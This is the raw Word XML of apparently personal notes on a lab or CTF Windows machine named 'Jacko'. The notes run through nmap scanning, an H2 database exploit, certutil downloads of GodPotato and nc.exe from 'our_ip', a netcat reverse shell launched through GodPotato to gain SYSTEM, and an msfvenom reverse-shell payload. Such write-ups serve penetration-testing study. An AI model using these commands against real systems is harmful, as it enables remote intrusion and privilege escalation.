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138067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FF60C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jacko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15E92B41" w14:textId="3ECAA7C4" w:rsidR="00F629FD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FF60C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV </w:t>
      </w:r>
      <w:r w:rsidR="00710D7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn -p- </w:t>
      </w:r>
      <w:r w:rsidR="00FF60C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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0DB153E" w:rsidR="00843DCE" w:rsidRDefault="00710D7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F02A979" w14:textId="2505D749" w:rsidR="00710D7B" w:rsidRDefault="00710D7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h2 database = find exploit of it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2DBFDF" w14:textId="77777777" w:rsidR="00F629FD" w:rsidRDefault="00F629FD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52F9FC3F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port 8082 the another http is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4EEA0E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connect so we find the perfect version which is 199</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D760DDF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 exploit data base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FF2EB4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the command just paste to the website then run it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="79D51876" w:rsidR="00843DCE" w:rsidRDefault="0038715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jacko\rony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53FB4BB2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lst 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A93CF51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run the last command again as only with c:\\wnow/rtar/sell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43854698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get the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF20BD5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whoami not work then run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BCE9AE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PATH=%SystemRoot%\system32;%SystemRoot%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045DA96E" w14:textId="77777777" w:rsidR="00387153" w:rsidRDefault="00387153" w:rsidP="0038715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notice perfectly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63F27B1A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whoami /all = impresonateprivilege enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869879C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notice the place where we can add files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33844C7B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/windows/Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576D83B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certutil -urlcache -split -f http://our_ip/GodPotato-NET4.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B524F8F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certutil -urlcache -split -f </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="007B4313">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://our_ip/nc.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FC3122A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lst 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099CC0C9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GodPotato-NET$.exe -cmd “nc.exe our_ip 4444 -e cmd.exe” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C853B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have root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B01AB3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</w:p>
    <w:p w14:paraId="76FD1EF0" w14:textId="77777777" w:rsidR="002A12D3" w:rsidRDefault="002A12D3" w:rsidP="002A12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msfvenom -p windows/x64/shell_reverse_tcp LHOST= ourip lPORT=port -f exe &gt; shelll43.exe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11999553" w:rsidR="00843DCE" w:rsidRDefault="002A12D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Desktop of </w:t>
      </w:r>
      <w:r w:rsidR="00387153">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we obtain the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83D6D"/>
    <w:rsid w:val="0024017E"/>
    <w:rsid w:val="002A12D3"/>
    <w:rsid w:val="00387153"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="004B7DC6"/>
    <w:rsid w:val="00710D7B"/>
    <w:rsid w:val="007C524F"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="009B4937"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D576FD"/>
    <w:rsid w:val="00E471B9"/>
    <w:rsid w:val="00EC5B19"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F629FD"/>
    <w:rsid w:val="00FF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1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our_ip/nc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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-11T16:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>